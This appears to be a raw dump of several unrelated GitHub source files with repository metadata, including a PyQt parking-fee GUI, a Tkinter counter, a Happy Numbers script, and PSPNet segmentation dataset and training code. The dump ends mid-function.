self.setAttribute(QtCore.Qt.WA_OpaquePaintEvent)\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n painter.drawImage(0, 0, self.image)\n self.image = QtGui.QImage()\n\n def initUI(self):\n self.setWindowTitle('Test')\n\n @QtCore.pyqtSlot(QtGui.QImage)\n def setImage(self, image):\n if image.isNull():\n print(\"Viewer Dropped frame!\")\n\n self.image = image\n if image.size() != self.size():\n self.setFixedSize(image.size())\n self.update()\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv) # 앱 객체 생성\n\n thread = QtCore.QThread()\n thread.start()\n vid = ShowVideo()\n vid.moveToThread(thread)\n\n image_viewer1 = ImageViewer()\n #image_viewer2 = ImageViewer()\n\n vid.VideoSignal1.connect(image_viewer1.setImage)\n #vid.VideoSignal2.connect(image_viewer2.setImage)\n \n #push_button1 = QtWidgets.QPushButton('Start')\n #push_button2 = QtWidgets.QPushButton('Canny')\n #push_button1.clicked.connect(vid.startVideo)\n #push_button2.clicked.connect(vid.canny)\n\n push_button2 = QtWidgets.QPushButton('등록')\n push_button3 = QtWidgets.QPushButton('정산')\n push_button4 = QtWidgets.QPushButton('등록된 차량메뉴')\n\n label1 = QLabel('차량번호 주차요금')\n label1.setAlignment(Qt.AlignCenter)\n font1 = label1.font()\n font1.setPointSize(10)\n label1.setFont(font1)\n\n label2 = QLabel('주차요금 표')\n label2.setAlignment(Qt.AlignCenter)\n font2 = label2.font()\n font2.setPointSize(20)\n label2.setFont(font2)\n\n label3 = QLabel('시간당 : 200만원')\n label3.setAlignment(Qt.AlignCenter)\n font3 = label3.font()\n font3.setPointSize(50)\n \n label3.setFont(font3)\n\n\n#------------------------------------------------------------\n\n vertical_layout1 = QtWidgets.QVBoxLayout()\n vertical_layout2 = QtWidgets.QVBoxLayout()\n\n button_layout = QtWidgets.QHBoxLayout()\n\n horizontal_layout = QtWidgets.QHBoxLayout()\n #horizontal_layout.addWidget(image_viewer2)\n\n\n vertical_layout1.addWidget(image_viewer1) # 캠화면\n \n #vertical_layout1.addWidget(push_button1) # 버튼\n vertical_layout1.addWidget(label1) # 텍스트 \n #vertical_layout.addWidget(push_button2)\n#------------------------------------------------------좌측 반쪽 화면\n\n\n\n\n vertical_layout2.addWidget(label2) # 주차요금 텍스트\n vertical_layout2.addStretch(1)\n vertical_layout2.addWidget(label3) # 주차요금표\n\n button_layout.addWidget(push_button2) #등록 버튼\n button_layout.addWidget(push_button3) # 정산 버튼 --- 수평 합체\n vertical_layout2.addStretch(2)\n vertical_layout2.addLayout(button_layout) # 수평합체한 버튼 \n vertical_layout2.addWidget(push_button4) # 등록됭 차량 메뉴\n vertical_layout2.addStretch(1)\n#-------------------------------------------------------우측 반쪽 화면\n\n\n\n horizontal_layout.addLayout(vertical_layout1)\n horizontal_layout.addLayout(vertical_layout2) # 좌측화면 우측화면 수평 합체\n layout_widget = QtWidgets.QWidget()\n layout_widget.setLayout(horizontal_layout)\n layout_widget.show()\n main_window = QtWidgets.QMainWindow()\n main_window.setCentralWidget(layout_widget)\n main_window.show()\n vid.startVideo()\n sys.exit(app.exec_())\n \n" } ]
3
nagano28/count_py
https://github.com/nagano28/count_py
8118570c0c0a45dbc34c4f93fa41e91b462429fc
b4ccb26f0e18550d90dc81d733bc04c475afac01
e8e58b7dd7fcd89c9aaffffc49c7dad4818a3baa
refs/heads/master
2020-05-04T14:45:30.042697
2019-04-03T05:06:15
2019-04-03T05:06:15
179,209,523
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5949177742004395, "alphanum_fraction": 0.6195814609527588, "avg_line_length": 20.253969192504883, "blob_id": "b72583df9d9437595395cab7f29527447b4689b4", "content_id": "260f96a6d94901f4cd11382f569cd3536c1f64f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1372, "license_type": "no_license", "max_line_length": 109, "num_lines": 63, "path": "/countNumber.py", "repo_name": "nagano28/count_py", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 24 13:17:44 2018\n\n@author: nagano\n\"\"\"\n\nimport tkinter as tk\nfrom datetime import datetime\nimport numpy as np\nimport sys\n\nroot = tk.Tk()\nroot.title(\"number count\")\nroot.geometry(\"150x100\")\nnumber = 0\n\ndef save():\n global number\n file = open('saveNumber.txt', 'w') #書き込みモードでオープン\n file.write(\"人数 : \"+str(number)+\" Time : \" + str(datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")))\n\ndef end():\n sys.exit()\n\n\n\ndef button_bushed():\n global number\n \n if selection.get() == -1:\n number += -1\n elif selection.get() == 1:\n number += 1\n \n print (\"number of people : %d 人__________時間 : %s\" %(number,datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")))\n\n\n\nselection = tk.IntVar()\ntk.Radiobutton( root, text=\"+1\", variable=selection, value= 1 ).pack()\ntk.Radiobutton( root, text=\"-1\", variable=selection, value= -1 ).pack()\n\ntk.Button(root, text='push!', command=button_bushed).pack(side=\"right\")\ntk.Button(root,text=\"save\",bg=\"gray\",command=save).pack(side=\"left\")\n\ntk.Button(root,text=\"exit\",bg=\"gray\",command=end).pack(side=\"left\")\n\n\nroot.mainloop()\n\n\n\"\"\"slide bar\ndef button_bushed():\n print s.get()\n\ntk.Button(root, text='push!', command=button_bushed).pack()\ns = tk.Scale(root , from_=0, to=100, orient=\"h\" )\ns.pack()\n\nroot.mainloop()\n\"\"\"" } ]
1
carloserodriguez2000/HappyNumbers
https://github.com/carloserodriguez2000/HappyNumbers
ce4dd96dac87b0997f013d5e04ad92ce3923dc7f
24ab005ee6d64521d058d555c64ca0fbc1d4142e
d6b2f3b7bc0f32db4e8c939bd1914fb49ccea017
refs/heads/master
2021-01-01T05:13:46.006832
2016-05-18T00:02:00
2016-05-18T00:02:00
59,035,611
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8600000143051147, "alphanum_fraction": 0.8600000143051147, "avg_line_length": 24, "blob_id": "efd46d5d27b9d91a4d3b1c650d4b680bdc3e7cc9", "content_id": "11e27f743af493a75edcdb63369b06ad743bdd7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 50, "license_type": "no_license", "max_line_length": 34, "num_lines": 2, "path": "/README.md", "repo_name": "carloserodriguez2000/HappyNumbers", "src_encoding": "UTF-8", "text": "# HappyNumbers\nImplements Happy numbers algorithm\n" }, { "alpha_fraction": 0.3882825970649719, "alphanum_fraction": 0.39632394909858704, "avg_line_length": 33.896907806396484, "blob_id": "b0020729d61f3944482d33924545bfd175ba93f9", "content_id": "a0fa43f47ddd746da0fd0cdaa79ded1059e521f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3482, "license_type": "no_license", "max_line_length": 99, "num_lines": 97, "path": "/Main.py", "repo_name": "carloserodriguez2000/HappyNumbers", "src_encoding": "UTF-8", "text": "################################################################################\r\n#\r\ndef checkValidNumber( sLine):\r\n if( sLine.isnumeric()):\r\n return True\r\n else:\r\n return False\r\n \r\n################################################################################\r\n#\r\ndef makeNumList( sLine ):\r\n stringInteger = str(sLine)\r\n digitList = list()\r\n for ch in stringInteger:\r\n digitList.append(ch)\r\n return digitList\r\n\r\n################################################################################\r\n#\r\ndef buildHappySqrArray(digitList):\r\n happyArray=list()\r\n index=0\r\n listLength=len(digitList)\r\n while ( index < listLength):\r\n digit = digitList[index]\r\n happyArray.append(int(digit)**2)\r\n index+=1\r\n ## for digit in digitList:\r\n ## happyArray.append(int(digit))\r\n return happyArray\r\n\r\n################################################################################\r\n#\r\ndef calcHappySum( happySquareList):\r\n sumSqr = 0\r\n for num in happySquareList:\r\n sumSqr+=num\r\n return sumSqr\r\n\r\n################################################################################\r\n#\r\ndef checkValidHappy(happyArray):\r\n return True\r\n\r\n################################################################################\r\n#\r\ndef CyclicSeqFound(happySumList):\r\n notHappyPattern=[4,16,37,58,89,145,42,20,4]\r\n if(notHappyPattern[0] in happySumList):\r\n startIndex = happySumList.index(4) #find the first occurrance of 4\r\n if( (len(happySumList)-startIndex) >= len(notHappyPattern)):\r\n for num in notHappyPattern:\r\n if (num == happySumList[startIndex]):\r\n matching = True\r\n else:\r\n matching = False\r\n break\r\n startIndex+=1\r\n else: matching = False\r\n else:\r\n matching = False\r\n\r\n \r\n return matching\r\n \r\n################################################################################\r\n#\r\ndef main ():\r\n happySumList = list()\r\n continueLoop = True\r\n while (continueLoop == True):\r\n sLine = input( 'Enter a Number: ')\r\n if (checkValidNumber(sLine) == True):\r\n moreNums = True\r\n while (moreNums == True) :\r\n digitList = makeNumList( sLine) # list of separated digits\r\n happySquares = buildHappySqrArray(digitList) # List of squared digits\r\n sumOfSqr = calcHappySum(happySquares)\r\n happySumList.append(sumOfSqr) # Sum the squares and append to list\r\n sLine = sumOfSqr\r\n if(sumOfSqr == 1):\r\n print('Happy found', happySumList)\r\n moreNums = False\r\n else:\r\n if( CyclicSeqFound(happySumList)== True):\r\n print('NOT happy found', happySumList)\r\n moreNums = False\r\n \r\n happySumList.clear()\r\n continueLoop = (input(\"Press 1 to run again: \") == '1')\r\n else :\r\n print(\"Thank you for Playing. Bye.\")\r\n \r\n################################################################################\r\n#\r\n################################################################################\r\nmain()\r\n" }, { "alpha_fraction": 0.4176136255264282, "alphanum_fraction": 0.46875, "avg_line_length": 28.114286422729492, "blob_id": "48e6f6068e9102ff500505d7cb13f70307d1e977", "content_id": "7539b3d9412bacce4a4c02f4281298c9d37c452e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1056, "license_type": "no_license", "max_line_length": 80, "num_lines": 35, "path": "/test.py", "repo_name": "carloserodriguez2000/HappyNumbers", "src_encoding": "UTF-8", "text": "\r\n################################################################################\r\n#\r\ndef CyclicSeqFound(happySumList):\r\n\r\n print( happySumList)\r\n #iterate until first 4 is found\r\n #iterated for pattern \"4,16,37,58,89,145,42,20,4\"\r\n notHappyPattern=[4,16,37,58,89,145,42,20,4]\r\n startIndex = happySumList.index(4) #find the first occurrance of 4\r\n if( (len(happySumList)-startIndex) >= len(notHappyPattern)):\r\n for num in notHappyPattern:\r\n print( num,happySumList[startIndex])\r\n if (num == happySumList[startIndex]):\r\n matching = True\r\n else:\r\n matching = False\r\n break\r\n startIndex+=1\r\n \r\n return matching\r\n\r\n\r\n################################################################################\r\n#\r\ndef main():\r\n\r\n happySumList=[4,4,37,58,89,145,42,20,4]\r\n found = CyclicSeqFound(happySumList)\r\n if (found == True):\r\n print ( 'cyclic found')\r\n else:\r\n print ( 'cyclic not found')\r\n\r\n\r\nmain()\r\n" } ]
3
danialkhilji/iot_pet_feeder
https://github.com/danialkhilji/iot_pet_feeder
081391ebcd63bc5e7f526f03bce24f313c676b8b
7165692b55833c81f4203a0204b18b3dcfd2b352
9879c462451185e60f14bcbcfe86499bee34e877
refs/heads/master
2023-05-29T01:45:26.234639
2021-06-20T14:11:09
2021-06-20T14:11:09
378,656,067
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.794366180896759, "alphanum_fraction": 0.794366180896759, "avg_line_length": 87.75, "blob_id": "0d3baad547855ba074130de4ca01967f5e3c3ceb", "content_id": "55aa28cda64efbb79b39cd1672d9d6d99b4a5c99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 355, "license_type": "no_license", "max_line_length": 143, "num_lines": 4, "path": "/README.md", "repo_name": "danialkhilji/iot_pet_feeder", "src_encoding": "UTF-8", "text": "Automatic pet feeder using Internet of Things (IOT).\nIt ensures that feed is available when its time for pet to eat.\nThis way healthy diet of pet is controlled and pet can be fed even when owner is not at home.\nOwner can check the status of feed usign ThingSpeak and ThingView app IFFT messaging service is used to alert owner when feed is at low levels.\n" }, { "alpha_fraction": 0.5720224976539612, "alphanum_fraction": 0.6153093576431274, "avg_line_length": 26.608108520507812, "blob_id": "1ae372d2905bb841b6420628ac8e8b2b1832582c", "content_id": "3611626dd95775d4897674b7c8eb7319642a0f7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4089, "license_type": "no_license", "max_line_length": 97, "num_lines": 148, "path": "/iot_pet_feeder.py", "repo_name": "danialkhilji/iot_pet_feeder", "src_encoding": "UTF-8", "text": "import machine\nimport time, urandom\nimport ssd1306 #display screen library\nfrom machine import Pin, I2C, PWM #to configure pins of sensors\n#display pins configuration\ni2c = I2C(-1, scl=Pin(22), sda=Pin(21), freq=100000)\ndisp = ssd1306.SSD1306_I2C(128, 64, i2c)\n#displaying text\ndisp.fill(0)\ndisp.text(\"Connecting to\", 0, 20)\ndisp.text(\"internet...\", 0, 40)\ndisp.show()\ntime.sleep(1)\n\n#To connect to the internet\nimport network\nwlan = network.WLAN(network.STA_IF) # create station interface\nwlan.active(True) # activate the interface\nwlan.scan() # scan for access points\nwlan.connect('wifi-name', 'wifi-password') # connect to an AP\nwlan.config('mac') # get the interface's MAC address\nwlan.ifconfig() # get the interface's IP/netmask/gw/DNS addresses\nif (wlan.isconnected == False):\n print('Connection unsuccessful')\n disp.fill(0)\n disp.text(\"Connection\", 20, 20)\n disp.text(\"Failed!\", 20, 40)\n disp.show()\n time.sleep(1)\nelse:\n print('Connection successful')\n disp.fill(0)\n disp.text(\"Connection\", 20, 20)\n disp.text(\"successful!\", 20, 40)\n disp.show()\n time.sleep(1)\n\ndisp.fill(0)\ndisp.text(\"Connecting with\", 0, 20)\ndisp.text(\"MQTT Broker\", 20, 40)\ndisp.show()\ntime.sleep(1)\n#Connecting MQTTClient\nfrom umqtt.simple import MQTTClient\nserver = 'mqtt.thingspeak.com'\nc = MQTTClient('ESP32_danial', server, ssl=True) #ssl=True mean TLS is enabled\nc.connect()\n\n#Thingspeak credentials\nCHANNEL_ID = \"\"\nAPI_KEY = \"\" #Write API Key from Thingspeak\ntopic = \"channels/\" + CHANNEL_ID + \"/publish/\" + API_KEY\n\nprint('Configuring I/O pins')\ndisp.fill(0)\ndisp.text(\"Configuring\",20, 20)\ndisp.text(\"I/O pins\", 20, 40)\ndisp.show()\ntime.sleep(1)\nfrom hcsr04 import HCSR04 #sonar library\ntime.sleep(1)\n#sonar pins\nsonar = HCSR04(trigger_pin=13, echo_pin=12, echo_timeout_us=1000000)\n#servo pins\np14 = machine.Pin(14)\nservo = machine.PWM(p14,freq=50,duty=77)\n\n\n#for listening to thingspeak\n#import urllib2\n#import json #not installing\n\nprint('Starting while loop')\nwhile True: \n distance = sonar.distance_cm()\n print('Sonar distance: ', distance)\n disp.fill(0)\n disp.text(\"Sonar distance: \", 0, 20)\n disp.text(str(distance), 30, 40)\n disp.show()\n time.sleep(2)\n \n if (distance <= 20): #change this to > instead of <\n print(\"Plate is empty!\")\n disp.fill(0)\n disp.text(\"Plate is empty!\", 0, 20)\n disp.text(\"Refilling...\", 0, 40)\n disp.show()\n time.sleep(1)\n #Refilling the plate\n servo.duty(20)\n time.sleep(1)\n print('Rotating')\n servo.duty(127)\n time.sleep(2)\n print('Rotating back')\n servo.duty(20)\n time.sleep(1)\n print(\"Plate filled\")\n disp.fill(0)\n disp.text(\"Plate refilled!\", 0, 30)\n disp.show()\n time.sleep(1)\n else:\n print(\"Food not finished\")\n disp.fill(0)\n disp.text(\"Plate is full\", 0, 30)\n disp.show()\n time.sleep(1)\n \n print('Publishing information')\n disp.fill(0)\n disp.text(\"Publishing info\", 0, 30)\n disp.show()\n time.sleep(1)\n \n #Publishing information on mqtt broker\n dst = \"field1=\"+str(distance) #sonar distance\n #c.publish(topic, fld1)\n if (distance <= 20):\n msg = 'Plate is empty!\\nRefilling...'\n else:\n msg = 'Plate is full!'\n \n #msg = \" \" + str(msg)\n #combined = dst + msg\n time.sleep(10)\n c.publish(topic, dst)\n \n print('Data published on broker') \n disp.fill(0)\n disp.text(\"Published!\", 0, 30)\n disp.show()\n time.sleep(1)\n #to read data from thingspeak\n# print('listening to thingspeak')\n# read_api = '9P3W6DR4JAJSOZNE'\n# channel_id = '1349736'\n# TS = urllib2.urlopen(\"http://api.thingspeak.com/channels/%s/feeds/last.json?api_key=%s\" \\\n# % (CHANNEL_ID,READ_API_KEY))\n# response = TS.read()\n# data=json.loads(response)\n# a = data['field1']\n# print('data received: ')\n# print (a)\n# time.sleep(1) \n# TS.close()\n time.sleep(1)\n\n\n\n" } ]
2
wutianyiRosun/PSPNet_PyTorch
https://github.com/wutianyiRosun/PSPNet_PyTorch
7d122f10cc81b65afe682692c59c445084735589
9ea95a81193885c355f545f3e9c359d261b2172f
4104faa977228dbac58e075a575405e18f42e2b8
refs/heads/master
2020-03-17T06:41:20.533395
2018-05-14T14:17:58
2018-05-14T14:17:58
133,365,342
23
2
null
null
null
null
null
[ { "alpha_fraction": 0.782608687877655, "alphanum_fraction": 0.782608687877655, "avg_line_length": 22, "blob_id": "dbc45afc28102941d66615913ad7b43147e6d610", "content_id": "82cbaf6031a3fb479faeaf558b6b48b4f0eb9171", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/pretrained/README.md", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "put init model on here\n" }, { "alpha_fraction": 0.5315181016921997, "alphanum_fraction": 0.5529031753540039, "avg_line_length": 35.72602844238281, "blob_id": "73026bb32b054ac365021481170250a05b1e41f0", "content_id": "909b9acfd41d4bde76ae2056d669602f7b886e74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8079, "license_type": "no_license", "max_line_length": 144, "num_lines": 219, "path": "/psp/cityscapes_datasets.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import torch\nimport os\nimport os.path as osp\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport collections\nimport torchvision\nimport cv2\nfrom torch.utils import data\n\n\nclass CityscapesDataSet(data.Dataset):\n \"\"\" \n CityscapesDataSet is employed to load train set\n Args:\n root: the Cityscapes dataset path, \n cityscapes\n ├── gtFine\n ├── leftImg8bit\n list_path: cityscapes_train_list.txt, include partial path\n mean: bgr_mean (73.15835921, 82.90891754, 72.39239876)\n\n \"\"\"\n def __init__(self, root, list_path, max_iters=None, crop_size=(512, 1024), mean=(128, 128, 128), scale=True, mirror=True, ignore_label=255):\n self.root = root\n self.list_path = list_path\n self.crop_h, self.crop_w = crop_size\n self.scale = scale\n self.ignore_label = ignore_label\n self.mean = mean\n self.is_mirror = mirror\n self.img_ids = [i_id.strip() for i_id in open(list_path)]\n if not max_iters==None:\n self.img_ids = self.img_ids * int(np.ceil(float(max_iters) / len(self.img_ids)))\n self.files = []\n\n # for split in [\"train\", \"trainval\", \"val\"]:\n for name in self.img_ids:\n img_file = osp.join(self.root, name.split()[0])\n #print(img_file)\n label_file = osp.join(self.root, name.split()[1])\n #print(label_file)\n self.files.append({\n \"img\": img_file,\n \"label\": label_file,\n \"name\": name\n })\n\n print(\"length of dataset: \",len(self.files))\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, index):\n datafiles = self.files[index]\n image = cv2.imread(datafiles[\"img\"], cv2.IMREAD_COLOR)\n label = cv2.imread(datafiles[\"label\"], cv2.IMREAD_GRAYSCALE)\n size = image.shape\n name = datafiles[\"name\"]\n if self.scale:\n f_scale = 0.5 + random.randint(0, 15) / 10.0 #random resize between 0.5 and 2 \n image = cv2.resize(image, None, fx=f_scale, fy=f_scale, interpolation = cv2.INTER_LINEAR)\n label = cv2.resize(label, None, fx=f_scale, fy=f_scale, interpolation = cv2.INTER_NEAREST)\n\n image = np.asarray(image, np.float32)\n \n image = image[:, :, ::-1] # change to BGR\n image -= self.mean\n img_h, img_w = label.shape\n pad_h = max(self.crop_h - img_h, 0)\n pad_w = max(self.crop_w - img_w, 0)\n if pad_h > 0 or pad_w > 0:\n img_pad = cv2.copyMakeBorder(image, 0, pad_h, 0, \n pad_w, cv2.BORDER_CONSTANT, \n value=(0.0, 0.0, 0.0))\n label_pad = cv2.copyMakeBorder(label, 0, pad_h, 0, \n pad_w, cv2.BORDER_CONSTANT,\n value=(self.ignore_label,))\n else:\n img_pad, label_pad = image, label\n\n img_h, img_w = label_pad.shape\n h_off = random.randint(0, img_h - self.crop_h)\n w_off = random.randint(0, img_w - self.crop_w)\n # roi = cv2.Rect(w_off, h_off, self.crop_w, self.crop_h);\n image = np.asarray(img_pad[h_off : h_off+self.crop_h, w_off : w_off+self.crop_w], np.float32)\n label = np.asarray(label_pad[h_off : h_off+self.crop_h, w_off : w_off+self.crop_w], np.float32)\n \n \n image = image.transpose((2, 0, 1)) # NHWC -> NCHW\n \n if self.is_mirror:\n flip = np.random.choice(2) * 2 - 1\n image = image[:, :, ::flip]\n label = label[:, ::flip]\n\n return image.copy(), label.copy(), np.array(size), name\n\nclass CityscapesValDataSet(data.Dataset):\n \"\"\" \n CityscapesDataSet is employed to load val set\n Args:\n root: the Cityscapes dataset path, \n cityscapes\n ├── gtFine\n ├── leftImg8bit\n list_path: cityscapes_val_list.txt, include partial path\n\n \"\"\"\n def __init__(self, root, list_path, f_scale=0.5, mean=(128, 128, 128), ignore_label=255):\n self.root = root\n self.list_path = list_path\n self.ignore_label = ignore_label\n self.mean = mean\n self.f_scale = f_scale\n self.img_ids = [i_id.strip() for i_id in open(list_path)]\n self.files = []\n for name in self.img_ids:\n img_file = osp.join(self.root, name.split()[0])\n #print(img_file)\n label_file = osp.join(self.root, name.split()[1])\n #print(label_file)\n image_name = name.strip().split()[0].strip().split('/',3)[3].split('.')[0]\n #print(\"image_name: \",image_name)\n self.files.append({\n \"img\": img_file,\n \"label\": label_file,\n \"name\": image_name\n })\n\n print(\"length of dataset: \",len(self.files))\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, index):\n datafiles = self.files[index]\n image = cv2.imread(datafiles[\"img\"], cv2.IMREAD_COLOR)\n label = cv2.imread(datafiles[\"label\"], cv2.IMREAD_GRAYSCALE)\n size = image.shape\n name = datafiles[\"name\"]\n if self.f_scale !=1:\n image = cv2.resize(image, None, fx=self.f_scale, fy=self.f_scale, interpolation = cv2.INTER_LINEAR)\n #label = cv2.resize(label, None, fx=self.f_scale, fy=self.f_scale, interpolation = cv2.INTER_NEAREST)\n\n image = np.asarray(image, np.float32)\n\n image = image[:, :, ::-1] # change to BGR\n image -= self.mean\n image = image.transpose((2, 0, 1)) # NHWC -> NCHW\n \n #print('image.shape:',image.shape)\n return image.copy(), label.copy(), np.array(size), name\n\nclass CityscapesTestDataSet(data.Dataset):\n \"\"\" \n CityscapesDataSet is employed to load test set\n Args:\n root: the Cityscapes dataset path, \n cityscapes\n ├── gtFine\n ├── leftImg8bit\n list_path: cityscapes_test_list.txt, include partial path\n\n \"\"\"\n def __init__(self, root, list_path='test.txt', f_scale=1, mean=(128, 128, 128), ignore_label=255, set='test'):\n self.root = root\n self.list_path = list_path\n self.ignore_label = ignore_label\n self.mean = mean\n self.f_scale = f_scale\n self.img_ids = [i_id.strip() for i_id in open(list_path)]\n self.files = []\n self.set = set\n for name in self.img_ids:\n #img_file = osp.join(self.root, \"leftImg8bit/%s/%s\" % (self.set, name))\n img_file = osp.join(self.root, name.strip())\n image_name = name.strip().split('/')[3].split('.')[0]\n self.files.append({\n \"img\": img_file,\n \"name\": image_name\n })\n print(\"lenth of dataset: \", len(self.files))\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, index):\n datafiles = self.files[index]\n\n #image = Image.open(datafiles[\"img\"]).convert('RGB')\n image = cv2.imread(datafiles[\"img\"], cv2.IMREAD_COLOR)\n name = datafiles[\"name\"]\n\n # resize\n if self.f_scale !=1:\n image = cv2.resize(image, None, fx=self.f_scale, fy=self.f_scale, interpolation = cv2.INTER_LINEAR)\n image = np.asarray(image, np.float32)\n\n size = image.shape\n image = image[:, :, ::-1] # change to BGR\n image -= self.mean\n image = image.transpose((2, 0, 1))\n\n return image.copy(), np.array(size), name\n\n\nif __name__ == '__main__':\n #dst = CityscapesDataSet(\"/home/wty/AllDataSet/CityScapes\",\n # '/home/wty/AllDataSet/CityScapes/cityscapes_train_list.txt', scale=False)\n dst = CityscapesValDataSet(\"/home/wty/AllDataSet/CityScapes\",\n '/home/wty/AllDataSet/CityScapes/cityscapes_val_list.txt')\n trainloader = data.DataLoader(dst, batch_size=3)\n for i, data in enumerate(trainloader):\n imgs, labels, size, name = data\n if i == 0:\n print(name)\n print(size)\n" }, { "alpha_fraction": 0.6053426861763, "alphanum_fraction": 0.6242274641990662, "avg_line_length": 40.96541976928711, "blob_id": "a1135885df99d5b38c42dc66b7a29bf77f99d065", "content_id": "ec77e0e8ce8470c69ad6d508b40091360552ed84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14562, "license_type": "no_license", "max_line_length": 152, "num_lines": 347, "path": "/train.py", "repo_name": "wutianyiRosun/PSPNet_PyTorch", "src_encoding": "UTF-8", "text": "import argparse\nimport torch\nimport torch.nn as nn\nfrom torch.utils import data\nimport numpy as np\nimport pickle\nimport cv2\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport scipy.misc\nimport torch.backends.cudnn as cudnn\nimport sys\nimport os\nimport os.path as osp\nfrom psp.model import PSPNet\nfrom psp.loss import CrossEntropy2d\nfrom psp.voc12_datasets import VOCDataSet\nfrom psp.cityscapes_datasets import CityscapesDataSet\nimport matplotlib.pyplot as plt\nimport random\nimport timeit\n\nstart = timeit.default_timer()\n\ndef get_arguments():\n \"\"\"Parse all the arguments provided from the CLI.\n \n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"PSPnet Network\")\n\n # optimatization configuration\n parser.add_argument(\"--is-training\", action=\"store_true\", \n help=\"Whether to updates the running means and variances during the training.\")\n parser.add_argument(\"--learning-rate\", type=float, default= 0.001, \n help=\"Base learning rate for training with polynomial decay.\") #0.001\n parser.add_argument(\"--weight-decay\", type=float, default= 0.0001, \n help=\"Regularisation parameter for L2-loss.\") # 0.0005\n parser.add_argument(\"--momentum\", type=float, default= 0.9, \n help=\"Momentum component of the optimiser.\")\n parser.add_argument(\"--power\", type=float, default= 0.9, \n help=\"Decay parameter to compute the learning rate.\")\n\n # dataset information\n parser.add_argument(\"--dataset\", type=str, default='cityscapes',\n help=\"voc12, cityscapes, or pascal-context.\")\n parser.add_argument(\"--random-mirror\", action=\"store_true\",\n help=\"Whether to randomly mirror the inputs during the training.\")\n parser.add_argument(\"--random-scale\", action=\"store_true\",\n help=\"Whether to randomly scale the inputs during the training.\")\n\n parser.add_argument(\"--not-restore-last\", action=\"store_true\",\n help=\"Whether to not restore last (FC) layers.\")\n parser.add_argument(\"--random-seed\", type=int, default= 1234,\n help=\"Random seed to have reproducible results.\")\n parser.add_argument('--logFile', default='log.txt', \n help='File that stores the training and validation logs')\n # GPU configuration\n parser.add_argument(\"--cuda\", default=True, help=\"Run on CPU or GPU\")\n parser.add_argument(\"--gpus\", type=str, default=\"0,1,2,3\", help=\"choose gpu device.\")\n\n\n return parser.parse_args()\n\nargs = get_arguments()\n\ndef configure_dataset_init_model(args):\n if args.dataset == 'voc12':\n\n args.batch_size = 10# 1 card: 5, 2 cards: 10 Number of images sent to the network in one step, 16 on paper\n args.maxEpoches = 15 # 1 card: 15, 2 cards: 15 epoches, equal to 30k iterations, max iterations= maxEpoches*len(train_aug)/batch_size_per_gpu'),\n args.data_dir = '/home/wty/AllDataSet/VOC2012' # Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/VOC2012/train_aug.txt' # Path to the file listing the images in the dataset\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.input_size = '473,473' #Comma-separated string with height and width of images\n args.num_classes = 21 #Number of classes to predict (including background)\n\n args.img_mean = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)\n # saving model file and log record during the process of training\n\n #Where restore model pretrained on other dataset, such as COCO.\")\n args.restore_from = './pretrained/MS_DeepLab_resnet_pretrained_COCO_init.pth'\n args.snapshot_dir = './snapshots/voc12/' #Where to save snapshots of the model\n args.resume = './snapshots/voc12/psp_voc12_3.pth' #checkpoint log file, helping recovering training\n \n\n elif args.dataset == 'cityscapes':\n args.batch_size = 8 #Number of images sent to the network in one step, batch_size/num_GPU=2\n args.maxEpoches = 60 #epoch nums, 60 epoches is equal to 90k iterations, max iterations= maxEpoches*len(train)/batch_size')\n # 60x2975/2=89250 ~= 90k, single_GPU_batch_size=2\n args.data_dir = '/home/wty/AllDataSet/CityScapes' # Path to the directory containing the PASCAL VOC dataset\n args.data_list = './dataset/list/Cityscapes/cityscapes_train_list.txt' # Path to the file listing the images in the dataset\n args.ignore_label = 255 #The index of the label to ignore during the training\n args.input_size = '720,720' #Comma-separated string with height and width of images\n args.num_classes = 19 #Number of classes to predict (including background)\n\n args.img_mean = np.array((73.15835921, 82.90891754, 72.39239876), dtype=np.float32)\n # saving model file and log record during the process of training\n\n #Where restore model pretrained on other dataset, such as coarse cityscapes\n args.restore_from = './pretrained/resnet101_pretrained_for_cityscapes.pth'\n args.snapshot_dir = './snapshots/cityscapes/' #Where to save snapshots of the model\n args.resume = './snapshots/cityscapes/psp_cityscapes_12_3.pth' #checkpoint log file, helping recovering training\n \n else:\n print(\"dataset error\")\n\n\n\ndef loss_calc(pred, label):\n \"\"\"\n This function returns cross entropy loss for semantic segmentation\n \"\"\"\n # out shape batch_size x channels x h x w -> batch_size x channels x h x w\n # label shape h x w x 1 x batch_size -> batch_size x 1 x h x w\n label = Variable(label.long()).cuda()\n criterion = torch.nn.CrossEntropyLoss(ignore_index=args.ignore_label).cuda()\n \n return criterion(pred, label)\n\n\ndef 